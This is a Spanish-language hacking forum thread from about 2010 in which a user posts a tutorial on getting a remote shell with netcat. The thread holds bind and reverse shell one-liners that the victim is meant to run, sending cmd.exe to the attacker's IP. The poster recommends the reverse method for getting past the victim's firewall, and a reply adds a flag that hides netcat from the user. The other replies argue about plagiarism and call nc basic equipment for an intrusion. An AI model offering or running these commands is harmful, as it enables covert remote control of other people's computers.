Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de
Autor
|
Tema: Conseguir Shell con Netcat (Leído 3,951 veces)
|
Pyr0s
c0der's
|
Conseguir Shell en Netcat
Autor: Pyr0s Foro: Evolution Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls Conexión DirectaEn este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente: nc -l -p 123 -e cmd.exe -l:Activa el modo escucha de nc -P: Permite a nc elegir el puerto -e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)Ese sería el comando que tendría que ejecutar la víctima Telnet 192.168.1.33 123 Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell Inversanc -v -l -p 123 -v: Informa del estado de Netcat -l:Activa el modo escucha de nc -P: Permite a nc elegir el puertoEsos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos nc 192.168.1.33 123 -e cmd.exe Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima Esto es todo, espero que os haya gustado el tutorial  Saludos!
|
|
|
|
|
|
|
|
|
n3w
¿Libertad? ¿Para qué?
|
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat  . Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados. [EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?
|
|
|
|
|
|
|
|
|
Pyr0s
c0der's
|
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat  . Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados. [EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no? DIOS! que dices loco pero si lo hice yo sin copiar nada aver vamos por puntos: - Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador? EDITO: Con la pública u.u
- No digas que lo he copiado sin tener ni idea
, ¿la pregunta que era a pillar?
Saludos!
|
|
|
|
« Última modificación: 10 Enero 2010, 16:57 por Pyr0s »
|
|
|
|
|
Shell Root
Alex Jurado
|
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P - Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P creo que en la inversa se puede hacer un No-IP también pero preferí poner la IP Re-WTF! No-IP!
|
|
|
|
|
|
 ---
|
|
|
Pyr0s
c0der's
|
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P - Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P creo que en la inversa se puede hacer un No-IP también pero preferí poner la IP Re-WTF! No-IP! ... esto ... gracias! xD ya modifique un poco el post, gracias la verdad es que mas salvado xD Saludos!
|
|
|
|
|
|
|
|
|
Shell Root
Alex Jurado
|
PD: Intenta jugar con los parametros del NetCat. Por Ejemplo:-d Significa que desvincula a netcat del cmd y lo hace trabajar en modo oculto.
|
|
|
|
|
|
 ---
|
|
|
fede_cp
"porque pensar nunca fue entender"
|
claro, las conexiones ya estás mas que aprendidas (no es para tirarte abajo, vale la intension), pero el netcat tiene bastantes parametros, para hacer combinaciones y generar nuevas funciones o cosas, por eso el creador dice, el netcat sirve para 1001 vainas  . saludos!
|
|
|
|
|
|
|
|
|
|
|
Pyr0s
c0der's
|
Motivais como nadie para que la gente aporte 
|
|
|
|
|
|
|
|
|
Debci
Wiki
Actualizate o muere!
|
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.
Saludos
|
|
|
|
|
|
|
|
|
peib0l
Wiki
vista mi blog ^.^
|
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.
Saludos
si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque 
|
|
|
|
|
|
|
|
|
Pyr0s
c0der's
|
Saludos
si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  Estas diciendo que nc no es útil a la hora de una intrusión 
|
|
|
|
|
|
|
|
|
peib0l
Wiki
vista mi blog ^.^
|
Saludos
si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  Estas diciendo que nc no es útil a la hora de una intrusión  estoy diciendo, que si no conoces estos comandos extremadamente basicos de nc , segurmante no reunas los conocimientos minimos para realizar una intrusion.
|
|
|
|
|
|
|
|
|
|
kamsky
|
y yo digo que Pyr0s se ha molestado en hacer algo para el foro, de más o menos nivel, eso es lo de menos, pero al fin y al cabo se ha molestado, si alguien no le gusta, simplemente que no lo lea, críticas no constructivas no sirven para mucho, me gustaría que todos los que las hacen se molestasen e invirtiesen su tiempo en hacer algún paper de forma que todos les podamos criticar...
si alguien tiene algún comentario que no tiene nada que ver con el contenido del post, ruego se lo guarde y no desvía el tema
gracias
|
|
|
|
|
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
peib0l
Wiki
vista mi blog ^.^
|
yo no e dicho que no sea mal aporte Kamsky, solo e echo una observacion a un comentario de un usuario, yo lo e leido y me a gustado que quede claro
mi comentario solo iva hacia ..::| D3Bć1 |::.
|
|
|
|
|
|
|
|
|
|
|